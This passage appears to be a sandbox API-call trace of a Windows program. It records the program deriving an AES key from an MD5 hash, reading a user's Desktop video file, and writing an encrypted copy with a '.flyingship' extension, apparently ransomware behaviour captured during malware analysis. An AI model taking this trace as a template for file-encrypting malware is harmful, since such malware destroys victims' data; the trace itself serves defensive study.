wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0161.901] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.902] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.902] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.902] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.902] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.902] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.905] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.906] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.906] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.906] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.906] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.906] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0161.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.906] CryptDestroyHash (hHash=0x90ae18) returned 1 [0161.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.907] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.907] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.908] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0161.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.910] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.910] ReadFile (in: hFile=0x120, lpBuffer=0xa48008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.912] ReadFile (in: hFile=0x120, lpBuffer=0xa48008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesRead=0x87efb8*=0x3f6b, lpOverlapped=0x0) returned 1 [0161.912] ReadFile (in: hFile=0x120, lpBuffer=0xa48008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa68018 | out: hHeap=0x8a0000) returned 1 [0161.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.915] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa68018 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.916] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.917] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.917] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.917] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.918] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.918] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.919] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, 